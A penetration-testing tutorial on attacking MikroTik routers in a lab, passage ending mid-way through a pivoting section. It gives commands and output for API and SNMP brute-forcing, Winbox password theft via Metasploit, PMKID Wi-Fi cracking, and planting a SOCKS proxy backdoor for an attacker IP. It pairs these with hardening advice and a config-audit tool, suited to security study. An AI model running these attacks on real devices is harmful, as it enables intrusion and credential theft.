Against: Pentesting MikroTik Routers

The use of MikroTik routers is widespread around the world and their security is an issue. This is a release of my article on attacks on MikroTik routers.

Against: Pentesting MikroTik Routers

The use of MikroTik routers is widespread around the world and their security is an issue. This is a release of my article on attacks on MikroTik routers.

Caster - Against

Genre: Offensive, Experimental
Label: exploit.org
Release Date: 27.09.2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, 1/160 sec, f/2.8, ISO 1250)

Intro

This article is a case study focusing on experimental methods applied to MikroTik networking equipment. The importance of network hardware security cannot be overemphasized, as it is a key element of the infrastructure on which the stability and protection of the entire network depends. When I wrote Against, I tried to demonstrate how configuration flaws can become attack vectors, and how pentesters can exploit these vulnerabilities to gain access to network infrastructure.

Disclaimer

All methods and techniques described in this article are for educational purposes only. The author and publication are not responsible for misuse of this knowledge. Using these techniques without the permission of the owners of the network equipment is illegal and violates the laws of most countries. The article is intended to raise awareness of network device security and is also useful for pentesters who are investigating vulnerabilities to protect infrastructure. Remember that this knowledge should only be used for ethical purposes. Don't risk your life and be careful.

Table of Contents

Chapter Subchapter
1. Intro
2. Disclaimer
3. RouterOS API Bruteforce 3.1 Why you need RouterOS API?
3.2 Bruteforce
4. MikroTik Hardware Search 4.1 Discovery Protocols
4.2 SNMP
4.2.1 How SNMP is usually abused?
4.2.2 Example of SNMP port search
4.2.3 SNMP Bruteforce
4.2.4 SNMP Enumeration with Metasploit
4.3 Nuclei
4.3.1 Why should you use Nuclei?
4.3.2 Example
4.4 UPnP Scanning
5. Absence of some security features 5.1 DAI
5.2 Storm Control
5.3 VACL
6. Metasploit: Winbox Credentials Extractor 6.1 How this post-exploitation module works
7. PMKID Attack on MikroTik Routers 7.1 Attack Equipment
7.2 PMKID Attack Example
7.2.1 Stage 1
7.2.2 Stage 2
7.2.3 Stage 3
7.3 PMKID Outro
8. Sara 8.1 Why is configuration analysis important?
8.2 Tool Installation
8.3 Config Analyzing
8.4 Analysis of the conclusion
8.5 Sara Outro
9. Pivoting 9.1 SOCKS
9.1.1 How it's gonna work
9.1.2 SOCKS Pivoting Map
9.1.3 SOCKS Pivoting
9.1.4 Socks Outro
9.2 SSH Dynamic Port Forwarding
9.2.1 SSH DPF Pivoting Map
9.2.2 Outro
10. RouterOS Post-Exploitation 10.1 Scans on Hardware: IP Scan
10.2 ARP Table
10.3 DNS Cache
10.4 Addressing Enumeration
10.5 Interfaces
11. Outro

RouterOS API Bruteforce

Yes yes, I realize how much of a hit bruteforce technique is against network hardware (SSH or Telnet) But there are times when the API service is overlooked by the system administrator. This service is often left open on all interfaces, which gives a potential attack vector to the equipment. As a result, an attacker can use the API to find credentials and gain access to device control.

The whole point is that a bruteforce attack is possible via APIs to brute force the accounts on the hardware.

The fact that the default account login on RouterOS is admin makes bruteforcing easier for the attacker

Why you need RouterOS API?

The API on MikroTik devices provides functionality to manage and configure the device. Administrators use it for automation and integration with third-party tools. However, if the API is left unchecked (e.g. with poorly protected passwords or even no access restrictions), it creates the opportunity for a bruteforce attack that aims to harvest logins and passwords to gain access to device management.

Often administrators leave the API open because they use it to automate tasks or integrate with other systems:

  • Either the API is actually in use and access to it is not filtered;
  • Or an attacker can take advantage of the fact that the API service is active by default.

The API is available by default on ports TCP/8728 and TCP/8729 To find them on hardware, just use scanners like nmap or masscan:

caster@kali:~$ sudo nmap -n -p 8728,8729 192.168.0.254
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 16:02 +05
Nmap scan report for 192.168.0.254
PORT     STATE SERVICE
8728/tcp open  api
8729/tcp open  api-ssl
In my case, the lab MikroTik uses the 192.168.0.254 address, accordingly being on the 192.168.0.0/24 subnet

Bruteforce

The MikrotikAPI-BF tool can be used to attack MikroTik APIs. This tool is specifically designed to brute force logins and passwords on MikroTik devices running open APIs. Such tools are freely available on the web, and this makes it much easier for attackers, especially if standard logins and weak passwords are used on devices.

This makes securing the device critical, as lack of access filtering and weak passwords can lead to an attacker easily gaining access to device control. It is important for administrators to recognize the risks and take steps to protect their devices, including filtering API access and using strong passwords.

caster@kali:~$ https://github.com/mrhenrike/MikrotikAPI-BF
caster@kali:~$ cd MikrotikAPI-BF
caster@kali:~/MikrotikAPI-BF$ python3 mikrotikapi-bf.py -h
caster@kali:~/MikrotikAPI-BF$ python3 mikrotikapi-bf.py -h

        __  __ _ _              _   _ _        _    ____ ___      ____  _____
        |  \/  (_) | ___ __ ___ | |_(_) | __   / \  |  _ \_ _|    | __ )|  ___|
        | |\/| | | |/ / '__/ _ \| __| | |/ /  / _ \ | |_) | |_____|  _ \| |_
        | |  | | |   <| | | (_) | |_| |   <  / ___ \|  __/| |_____| |_) |  _|
        |_|  |_|_|_|\_\_|  \___/ \__|_|_|\_\/_/   \_\_|  |___|    |____/|_|


                    Mikrotik RouterOS API Bruteforce Tool 1.1
                            André Henrique (@mrhenrike)
          Please report tips, suggests and problems to Twitter (@mrhenrike)
                    https://github.com/mrhenrike/MikrotikAPI-BF
       

    NAME
    	 mikrotikapi-bf.py - Brute force attack tool on Mikrotik box credentials exploiting API requests

    USAGE
    	 python mikrotikapi-bf.py [-t] [-p] [-u] [-d] [-s] [-q] [-a]

    OPTIONS
    	 -t, --target 		 RouterOS target
    	 -p, --port 		 RouterOS port (default 8728)
    	 -u, --user 		 User name (default admin)
    	 -h, --help 		 This help
    	 -d, --dictionary 	 Password dictionary
    	 -s, --seconds 		 Delay seconds between retry attempts (default 1)
    	 -q, --quiet 		 Quiet mode
    	 -a, --autosave 		 Automatically save current progress to file, and read from it on startup

    EXAMPLE
    	 python3 mikrotikapi-bf.py -t 192.168.0.200 -u manager -p 1337 -d /tmp/passwords.txt -s 5
    	 python3 mikrotikapi-bf.py -t 192.168.0.1 -d /tmp/passwords.txt
    	 python3 mikrotikapi-bf.py -t 192.168.0.1 -d /tmp/passwords.txt -a /tmp/autosave.json

Trying to bruteforce the password:

caster@kali:~/MikrotikAPI-BF$ python3 mikrotikapi-bf.py -t 192.168.0.254 -u desire -d passwordsprediction

        __  __ _ _              _   _ _        _    ____ ___      ____  _____
        |  \/  (_) | ___ __ ___ | |_(_) | __   / \  |  _ \_ _|    | __ )|  ___|
        | |\/| | | |/ / '__/ _ \| __| | |/ /  / _ \ | |_) | |_____|  _ \| |_
        | |  | | |   <| | | (_) | |_| |   <  / ___ \|  __/| |_____| |_) |  _|
        |_|  |_|_|_|\_\_|  \___/ \__|_|_|\_\/_/   \_\_|  |___|    |____/|_|


                    Mikrotik RouterOS API Bruteforce Tool 1.1
                            André Henrique (@mrhenrike)
          Please report tips, suggests and problems to Twitter (@mrhenrike)
                    https://github.com/mrhenrike/MikrotikAPI-BF
       
[*] Starting bruteforce attack...
---------------------------------
[-] Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 6 passwords in list...

[-] Trying 1 of 6 Passwords - Current: admin
[-] Trying 2 of 6 Passwords - Current: clona
[-] Trying 3 of 6 Passwords - Current: zetta
[-] Trying 4 of 6 Passwords - Current: thebalance
[+] Login successful!!! User: desire Password: thebalance
__________________________________________
Elapsed Time: 4.2 sec | Passwords Tried: 4

In the end, the API bruteforce was successful, we found the desire:thebalance account. Administrators should disable the API when the service is not in use or filter access to it. Also, use complex passwords.

MikroTik Hardware Search

In this section, I will show you various techniques and tools that you can use to find MikroTik devices on your network. This step is critical in infrastructure attacks because it allows you to identify devices and get information about available services.

Discovery Protocols

Discovery Protocols are network protocols that allow you to find devices on a local network. They are often used to automatically discover routers, switches, servers, and other devices. On MikroTik devices, protocols such as LLDP (Link Layer Discovery Protocol), CDP (Cisco Discovery Protocol), and MNDP (MikroTik Neighbor Discovery Protocol) can be active and transmit information about the network infrastructure.

These protocols are often left enabled for ease of network management, which simplifies device configuration and diagnostics. It is also common practice to have these protocols enabled by default on all ports on a device.

Attack example:

To detect and process the traffic of these protocols, the Above tool can be used to quickly capture and analyze network traffic. More detailed packet analysis can be performed in Wireshark.

caster@kali:~$ sudo above --interface eth0 --timer 450
MNDP and LLDP frames (L2)

Device discovery protocols are thus a powerful tool for an attacker because they can reveal critical information about network infrastructure and devices. Using tools such as Above and Wireshark, it is possible to quickly gather data about network topology and vulnerable devices, which is one of the first steps in pentesting the internal infrastructure.

SNMP

SNMP (Simple Network Management Protocol) - is a protocol that is widely used to monitor and manage network devices. It gives the administrator access to key information about the device's operation, such as CPU usage, memory status, routing tables and many other parameters. MikroTik devices support SNMP and can be configured to work with this protocol.

How SNMP is usually abused?

In practice, it is common to see SNMP configured using standard community strings such as public and private
These strings provide read access to the data, which can allow an attacker to gather critical information about the configuration and status of the device. Furthermore, SNMP can be used to learn the firmware version, device model, and other parameters that can help an attacker plan future actions.

First, to find devices on the network that support SNMP, you can use nmap to search for open port 161 (the standard SNMP port). Example of a network search:

caster@kali:~$ sudo nmap -sU -p 161 192.168.0.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 16:15 +05
Nmap scan report for 192.168.0.254
Host is up (0.0047s latency).
PORT    STATE SERVICE
161/udp open  snmp

This query will help identify devices that are using SNMP by scanning the subnet for an open port.

SNMP Bruteforce

Once a device with active SNMP is found, you can attempt to bruteforce the community strings to gain access to its data. One popular tool for SNMP bruteforcing is onesixtyone

caster@kali:~$ sudo onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.0.254 

This command will run bruteforce strings using the snmp.txt dictionary

caster@kali:~$ sudo onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.0.254 
Scanning 1 hosts, 3219 communities
192.168.0.254 [public] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [private] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [private] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [public] RouterOS C52iG-5HaxD2HaxD

If the string is found, the attacker can extract sensitive information about the device. For example, using MSF.

SNMP Enumeration with Metasploit

Besides using bruteforce tools, you can perform more detailed SNMP enumeration using the snmp_enum module in the Metasploit Framework. This module allows you to get detailed information about the device, such as interface list, routing tables, firmware versions and other important parameters.

caster@kali:~$ msfconsole
msf6 > use auxiliary/scanner/snmp/snmp_enum 
msf6 auxiliary(scanner/snmp/snmp_enum) > 

The following must be specified:

  • RHOSTS - the address of the target router;
  • COMMUNITY - the string detected by the attacker, in my case it is public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.0.254
RHOSTS => 192.168.0.254
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
COMMUNITY => public

Then start the module:

msf6 auxiliary(scanner/snmp/snmp_enum) > run

In addition to uptime, system name, information about the device model, addressing used, interfaces, etc. can be retrieved via SNMP.

Thus, SNMP remains one of the most vulnerable protocols when misconfigured, especially if standard community strings are used or access to the SNMP service is not filtered in any way. Having such access can provide an attacker with detailed information about the device, its configuration and state, which can help to plan and execute further attacks.

Nuclei

Nuclei - is a powerful template-based vulnerability and exploit search tool. It can be used to automatically search for known vulnerabilities on devices including MikroTik RouterOS. Nuclei supports various templates for finding vulnerabilities such as open APIs, outdated software versions, and can also detect access to administration panels via HTTP/HTTPS on MikroTik devices.

Why should you use Nuclei?

Nuclei effectively automates the vulnerability detection process, making it fast and convenient. In the case of MikroTik RouterOS, Nuclei templates allow you to find open APIs, legacy FTP servers, SSH services, and even access to administrative interfaces (www)

Examples of templates for MikroTik:

network/detection/mikrotik-ssh-detect.yaml
network/detection/mikrotik-ftp-server-detect.yaml
network/detection/mikrotik-routeros-api.yaml
http/exposed-panels/mikrotik/mikrotik-routeros.yaml
http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml

These templates allow you to automate the process of finding vulnerabilities, which is especially useful when conducting security testing of an infrastructure with multiple devices.

Example

To use Nuclei templates, simply specify a file with a list of targets and apply the desired templates. For example, to search for open APIs on MikroTik devices using the mikrotik-routeros-api.yaml template, the command would look as follows:

caster@kali:~$ nuclei -l test -t .local/nuclei-templates/network/detection/mikrotik-routeros-api.yaml
      __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

		projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v10.0.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 255
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[mikrotik-routeros-api] [tcp] [info] 192.168.0.254:8728

The result shows that the target device at 192.168.0.254 has the MikroTik RouterOS API service open on the TCP/8728 port.

Nuclei can be easily integrated into automated security testing processes, thanks to its support for templates for different types of vulnerabilities.

UPnP Scanning

UPnP (Universal Plug and Play) is a protocol that allows devices on a network to automatically discover each other and forward ports without user intervention.On MikroTik devices, UPnP can be activated to automatically forward ports, making it a potential entry point for attacks.
If UPnP is not properly configured or filtered, an attacker can gain access to sensitive device and configuration information. UPnP can reveal the RouterOS version and also provide access to an XML file with port mapping, which can be used for further attacks.

To find out if UPnP is active on a device, you can use the upnp-info script in nmap to extract information about a running UPnP service. Example command for scanning:

caster@kali:~$ sudo nmap -n -sU -p 1900 192.168.0.0.0/24 --script upnp-info

The scan output can show the RouterOS version and the path to the XML file containing the port forwarding information. It looks something like this:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 10:22 +05

Nmap scan report for 192.168.0.254
Host is up (0.012s latency).

PORT STATE SERVICE
1900/udp open upnp
| upnp-info: 
| 192.168.0.254
| Server: RouterOS/7.15.3UPnP/1.0 MikroTik UPnP/1.0
|_ Location: http://192.168.0.254:2828/gateway_description.xml

With this script, you can get the path to an XML file that can contain port mapping information, as well as other details such as IP addresses, types of devices connected, and their capabilities.

In XML, you'll be able to detect mapping of forwarded devices if there are indeed hosts on the network that use UPnP. Typically these are IoT devices, cameras, etc.

But you might have paid attention to:

RouterOS/7.15.3UPnP/1.0 MikroTik UPnP/1.0

The RouterOS version on this device is 7.15.3, UPnP scanning helped to detect a MikroTik device that an attacker could start to develop various kinds of attacks against. The information obtained about the RouterOS version can be used to find and exploit known vulnerabilities specific to this version.

Absence of some security features

MikroTik devices running RouterOS and SwitchOS lack important network security mechanisms such as DAI, Storm Control and VACL. These features play a key role in protecting networks from various attacks, including ARP spoofing, IP spoofing, and uncontrolled access between VLANs, etc. The absence of these mechanisms greatly increases the risks to the infrastructure, giving attackers more opportunities to attack and manipulate within the network.

DAI

DAI (Dynamic ARP Inspection) - is a technology that prevents ARP spoofing by inspecting ARP requests and responses. Without DAI, an attacker can conduct ARP Spoofing and intercept traffic within the network by performing a Man-in-the-Middle attack, which can lead to data leakage and unauthorized access to resources.

Storm Control

Storm Control - is a mechanism that limits the rate of broadcast and multicast packets, preventing broadcast storms that can overload a network. Without this mechanism, an attacker could initiate a storm-causing attack that would shut down part of a network or even an entire segment. Storm Control could also help detect unauthorized port scans, as the scanners that pentesters use are very fast and in most cases run at random.

VACL

VACL (VLAN Access Control List) - are used to filter traffic within VLANs, providing finer-grained control over access between different network segments. The absence of VACLs allows attackers to cross VLAN boundaries, which opens the door to attacks on segmented parts of the network that should normally be isolated.

Metasploit: Winbox Credentials Extractor

This Metasploit module is designed to extract stored passwords from Winbox settings on MikroTik devices when the “Keep Password” option is enabled. It works on compromised Windows hosts where Winbox is installed and extracts account data that can be used for further access to devices.

This post-exploitation vector is directly related to human error. The success of the attack depends on the MikroTik administrator leaving the “Keep Password” option enabled in Winbox. This option automatically saves the password in the configuration file, making it available to an attacker in case the system is compromised. Abuse of this feature occurs when an administrator neglects security by relying on the convenience of stored passwords, leading to the risk of leaking important data and compromising the device.

Before running the module, it is important to understand in which session the compromised machine is running, for this purpose:

  • Check active sessions:
sessions
  • To exit the Meterpreter shell and leave the session active, use:
background

Then after logging out of the session, you need to load the post/windows/gather/credentials/winbox_settings post-exploitation module:

msf6 exploit(multi/handler) > use post/windows/gather/credentials/winbox_settings

Specify the session number. When you have active shells in Metasploit, each of them has a unique numeric identifier, use it:

msf6 post(windows/gather/credentials/winbox_settings) > set SESSION 2
In my case, the session had an ID of 2

And then running the module:

msf6 post(windows/gather/credentials/winbox_settings) > show options

Module options (post/windows/gather/credentials/winbox_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on


View the full module info with the info, or info -d command.
msf6 post(windows/gather/credentials/winbox_settings) > run

Result:

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\caster\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[+] Login: engineer
[+] Password: clonazepam1337
[*] Post module execution completed
msf6 post(windows/gather/credentials/winbox_settings) > 
Module operation

How this post-exploitation module works

The module checks the path:

C:\Users\caster\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw

It extracts credentials, such as login and password, from the settings.cfg.viw file. Example of extracted data:

  • Login: engineer
  • Password: clonazepam1337

This account can be used to access MikroTik devices via Winbox or other administrative interfaces. Check the validity of the received account:

Successful connection to the router using SSH, engineer:clonazepam1337

In this way, an account can be obtained to access the equipment. The module is especially useful if the attack occurs on computers of the IT department, system administrators.

PMKID Attack on MikroTik Routers

PMKID is an identifier generated during the WPA/WPA2 authentication process. This identifier is transmitted during the messaging process, and if intercepted by an attacker, it can be used to attempt to crack the Wi-Fi network password through a dictionary or brute force attack.

On MikroTik devices, Wi-Fi interfaces by default use the PMKID (Pairwise Master Key Identifier) mechanism for authentication. While this method is useful for speeding up client reconnection, it also creates a vulnerability that can be exploited for an attack. The PMKID can be extracted from the network without requiring clients to actively connect to the AP, making the attack more stealthy.

Attack Equipment

I used the Alfa AWUS036AC adapter with Alfa ARS-N19 antennas to perform the attack. This adapter uses the RTL8812AU chip, which makes it a great tool for wardriving

AWUS036AC & ARS-N19

PMKID Attack Example

A tool wifite, which automates attacks on Wi-Fi networks, including PMKID capture and cracking, was used to perform the PMKID attack. Wifite is a popular wireless network testing tool that simplifies the process of attacking various authentication protocols, including WPA/WPA2 using PMKID. It allows you to automate all steps from packet capture to password cracking attempts via dictionaries.

Stage 1

The attacker selects a target AP that has PMKID enabled. To do this, wifite scans nearby Wi-Fi networks and identifies those that use WPA/WPA2 with active PMKID.

caster@kali:~$ sudo wifite -i wlan1 --pmkid

The tool will scan the available Wi-Fi networks and displays a list of them to select a target.

The --pmkid option in wifite activates the PMKID capture mode, which allows the tool to search and extract PMKIDs from available networks using WPA/WPA2

Stage 2

Unlike a classic WPA attack where you have to force the client to reconnect to the AP, a PMKID attack does not require active connections to the network. This makes the attack more stealthy, as there is no disruption of user sessions.

PMKID Capture Example:

[+] (1/1) Starting attacks against 44:A4:84:XX:XX:XX (MSC)
[+] MSC (79db) PMKID CAPTURE: Loaded existing PMKID hash: hs/pmkid_MSC_44-A4-84-XX-XX-XX_2024-09-25T16-30-09.22000

In this example, wifite discovered the MSC access point with BSSID 44:A4:84:XX:XX:XX:XX, which uses PMKID, and successfully captured its hash.

Stage 3

After capturing the PMKID, wifite moves on to the next step, which is to attempt to crack the password using a dictionary. To do this, it uses dictionary files such as wordlist-probable.txt and tries to match the password based on the captured PMKID.

[+] MSC (79db) PMKID CRACK: Cracking PMKID using /usr/share/dict/wordlist-probable.txt ...

The tool searches passwords from the dictionary until the correct password is found.

It is important to note that the success of the attack directly depends on the quality of the dictionary used. If the password is not contained in the dictionary, the attack will fail

After a successful bruteforce, wifite displays the result, including the access point name (SSID), BSSID, network key (password) and the file where the PMKID is saved for further analysis.

An example of a successful attack:

[+] MSC (79db) PMKID CRACKED: Key: 44a484xxxxxx:dc701486178f:MSC:benzodiazepines
[+]   Access Point Name: MSC
[+]  Access Point BSSID: 44:A4:84:XX:XX:XX
[+]          Encryption: PMKID
[+]          PMKID File: hs/pmkid_MSC_44-A4-84-XX-XX-XX_2024-09-25T16-30-09.22000
[+]      PSK (password): 44a484xxxxxx:dc701486178f:MSC:benzodiazepines
[+] saved crack result to cracked.json (1 total)

In this example, the attacker successfully cracked the password benzodiazepines for the MSC network PMKID was saved for later use.

PMKID Outro

The PMKID attack does not require active clients, which makes it more convenient and less noticeable compared to classic WPA/WPA2 attack methods such as 4-way handshake attack. With a massive dictionary and a monitoring mode enabled adapter, the attack can be successfully executed in a short time. Administrators can protect themselves by disabling PMKID on their interfaces or using complex passwords that are resistant to dictionary attacks.

Sara

Sara is a tool I developed to analyze configurations of MikroTik RouterOS devices. The main goal of Sara is to automate the process of analyzing configuration files, identifying vulnerabilities, configuration weaknesses and exploitation opportunities. The tool was created to quickly and accurately analyze configurations that may contain potential security issues such as invalid firewall rules, open ports, weak passwords, and invalid routes.

Why is configuration analysis important?

Network device configurations are often the cause of vulnerabilities. Incorrect firewall settings, default passwords, uncovered ports, or outdated security policies can open the door to attacks. Sara analyzes these configuration files, identifying potential threats and providing recommendations for security improvements.

Tool Installation

Sara was added to the Kali Linux repository on September 19, 2024, making it easy to install and use. Use the following command to install the tool:

caster@kali:~$ sudo apt update && sudo apt install sara

After installation, you can invoke the tool's help with the command:

caster@kali:~$ sara -h                                              

    _____                 
   / ____|                
  | (___   __ _ _ __ __ _ 
   \___ \ / _` | '__/ _` |
   ____) | (_| | | | (_| |
  |_____/ \__,_|_|  \__,_|  v1.0

    RouterOS Security Inspector. Designed for security professionals

    Author: Magama Bazarov, <[email protected]>

    It's recommended to provide a configuration file exported using the 'export verbose' command

usage: sara [-h] --config-file CONFIG_FILE

options:
  -h, --help            show this help message and exit
  --config-file CONFIG_FILE
                        Path to the RouterOS configuration file (or .rsc)

Config Analyzing

To analyze the configuration file of a MikroTik router, you need to pass the .rsc format file exported from the device. This can be done as follows:

caster@kali:~$ sara --config routeros-config.rsc  

The tool will perform a detailed configuration analysis, providing a report on potential vulnerabilities and recommendations for remediation:

caster@kali:~$ sara --config routeros-config.rsc                    

    _____                 
   / ____|                
  | (___   __ _ _ __ __ _ 
   \___ \ / _` | '__/ _` |
   ____) | (_| | | | (_| |
  |_____/ \__,_|_|  \__,_|  v1.0

    RouterOS Security Inspector. Designed for security professionals

    Author: Magama Bazarov, <[email protected]>

    It's recommended to provide a configuration file exported using the 'export verbose' command

[*] Analyzing the configuration file: routeros-config.rsc (34.69 KB)

[+] Device Information
    [*] RouterOS Version: 7.15.3
    [*] Model: C52iG-5HaxD2HaxD
    [*] Serial Number: XXXXXXXXXXX

[+] Checking RMI Services
    [!] Warning: The following RMI services are enabled and may be unsafe: telnet, ftp, www.
    [!] Caution: The following RMI services are enabled: ssh, www-ssl, winbox.
    [!] Note: The following RMI services are enabled and might be susceptible to brute force attacks: api, api-ssl.
    [*] Solution: Disable the above RMI services if they are not required for security.
    [*] Tip: Restrict access to enabled services to trusted subnets only.

[+] Checking UPnP
    [!] Warning: UPnP is enabled. This can expose your network to various security risks, including unauthorized access.
    [*] Solution: Disable UPnP unless absolutely necessary, and ensure your firewall is properly configured.

[+] Checking WiFi Settings
    [!] Warning: WPS is enabled on interface wifi1. WPS Pin code can be cracked, brute-forced.
    [!] Warning: PMKID is enabled on interface wifi1. PMKID is easy to bruteforce.

[+] Checking DNS Settings
    [!] Warning: Router is configured to allow remote DNS requests. Close the DNS UDP/53 port from the Internet.
    [!] Note: DNS over HTTPS (DoH) is not configured. Consider configuring a DoH server for improved privacy.

[+] Checking PoE Settings
    [!] Warning: PoE is enabled on interface ether1 with setting 'auto-on'. This could supply power to connected devices and potentially damage them if not properly managed.

[+] Checking Protected RouterBOOT
    [!] Warning: Protected RouterBOOT is disabled. This may allow unauthorized changes to the bootloader settings.
    [*] Solution: Enable Protected RouterBOOT to prevent unauthorized access to the bootloader.

[+] Checking SOCKS Proxy
    [!] Warning: SOCKS Proxy is enabled. The presence of SOCKS may indicate that the device has been compromised.
    [*] Solution: Disable SOCKS Proxy if it is not required.

[+] Checking User Password Policies
    [!] Warning: Password policies are not properly configured. Both minimum password categories and minimum password length are set to 0.
    [*] Solution: Set a higher minimum password length and require at least one or more character categories (e.g., uppercase, lowercase, numbers, special characters) for better security.

[+] Checking Connection Tracking
    [!] Connection Tracking is currently set to 'auto'.
    [*] Advice: If this device is being used as a transit router, you might consider disabling Connection Tracking to improve performance. However, proceed with caution as it can affect certain network features.

[+] Checking RoMON Settings
    [!] Warning: RoMON is enabled. If you are using RoMON, you should carefully manage its settings, as an attacker might use it to gain access to other RouterOS devices.
    [*] Advice: Regularly review RoMON configurations and ensure that only authorized devices can use RoMON.

[+] Checking SNMP Communities
    [!] Warning: SNMP community 'public' is in use. Possible Information Gathering attack vector by bruteforcing community string.
    [!] Warning: SNMP community 'private' is in use. Possible Information Gathering attack vector by bruteforcing community string.
    [*] Solution: Change the SNMP community names to something more secure, and restrict SNMP access to trusted IP addresses only.
Sara is doing a configuration analysis

Analysis of the conclusion

From the presented output of Sara, we can notice several vulnerabilities that can pose a threat to the network:

  1. Open RMI services (telnet, ftp, www): These services may not be secure unless encryption is used. Recommendation is to disable them if they are not needed and restrict access to trusted networks only;
  2. Active UPnP: This is a known attack vector because it allows automatic port forwarding, creating an opportunity for unauthorized access. It is recommended to disable UPnP if it is not needed;
  3. Wi-Fi settings (WPS and PMKID): Enabled WPS and PMKID are vulnerable to brute-force and hacking attacks. Disabling these features will improve wireless security;
  4. Remote DNS queries: Opening a DNS port for queries from the Internet can lead to attacks such as DNS amplification. Closing this port and using DoH will improve security and privacy;
  5. PoE settings: Enabled PoE can cause damage to connected devices if not properly configured. This requires monitoring or disabling PoE when not in use;
  6. RouterBOOT protection disabled: This may allow an attacker to change the bootloader settings, which could result in unauthorized configuration changes. RouterBOOT protection must be enabled;
  7. Insecure SNMP Communities: Using default values such as public and private allows attackers to easily access information via SNMP. It is necessary to change these values to more secure values and restrict access by IP.

Sara Outro

Network device configurations play a key role in infrastructure security. Even if a device contains no known vulnerabilities or exploits, misconfigurations can be a serious threat. Misconfigurations such as open ports, activated legacy services, or weak passwords create potential entry points for attackers. These vulnerabilities are often ignored by administrators, but they can be used to escalate privileges, bypass security measures, and execute attacks such as password brute force, firewall attacks, or stealth attacks via insecure services.

Therefore, regular analysis of network device configurations is an important part of the overall network defense process. Even if there are no critical vulnerabilities, the configuration should be reviewed to ensure that secure passwords are used, traffic is filtered correctly, and unnecessary services are disabled.

Pivoting

Pivoting (from the word pivot) - is a technique used by attackers or security professionals to extend access within a compromised network. Once one device on a network is successfully compromised, an attacker can use it as a pivot point to move to other segments or devices on that network. The primary goal of pivoting is to bypass network restrictions, such as firewalls, and gain access to isolated systems or resources that are not directly accessible from the outside.

CAUTION: These pivoting techniques will work, both from the Internet and within the infrastructure.

SOCKS

A method by which an attacker can redirect traffic through a compromised device by creating a proxy server. MikroTik RouterOS allows you to configure a built-in SOCKS server that can be used for pivoting. Once the SOCKS server is configured, an attacker can break into the internal infrastructure through RouterOS using it as an entry point.

How it's gonna work

  1. Configuring a SOCKS server on RouterOS: After compromising a MikroTik device, an attacker configures a SOCKS proxy to redirect traffic.This involves selecting the SOCKS version (version 4 or 5), specifying the port, and adding IP addresses that are allowed access.

Example of setting up a SOCKS server on MikroTik:

/ip/socks/access/add src-address=89.169.135.43 action=allow
/ip/socks/set enabled=yes version=5 port=7777

RouterOS commands (SOCKS)

In this example, a SOCKS server version 5 is configured on RouterOS on port 7777 and access is granted to the attacker's IP address 89.169.135.43
  1. Port Availability Check: For a successful connection, it is important to make sure that port 7777 is available from the Internet. If the Firewall is blocking this port, you must add a rule to open it:
/ip/firewall/filter/add chain=input port=7777 protocol=tcp in-interface=ether1 action=accept

RouterOS firewall rule for TCP/7777

  1. Attacker Connection via SOCKS: An attacker connects to the RouterOS SOCKS server over the Internet using their device's proxy settings. In this case, the attacker configures the proxychains configuration file to route traffic through the SOCKS proxy.

In the /etc/proxychains.conf file, you must specify the IP address of the compromised device and the port on which the SOCKS server is running:

socks5 <victim_public_ip> 7777

SOCKS Pivoting Map

I drew a little net drawing of what it would look like

SOCKS Pivoting Map

SOCKS Pivoting

Now, using proxychains, an attacker can run commands or applications through a SOCKS proxy. For example, run nmap to scan the internal network through a compromised router:

Example of scanning an SSH port with the -sT flag, towards hosts inside 10.10.100.0/24
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.100
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:40 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.100:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.100:22  ...  OK
Nmap scan report for 10.10.100.100
Host is up (0.095s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.200
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:40 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.200:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.200:22  ...  OK
Nmap scan report for 10.10.100.200
Host is up (0.095s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.7
[proxychains] config file found: /etc/proxychains.conf
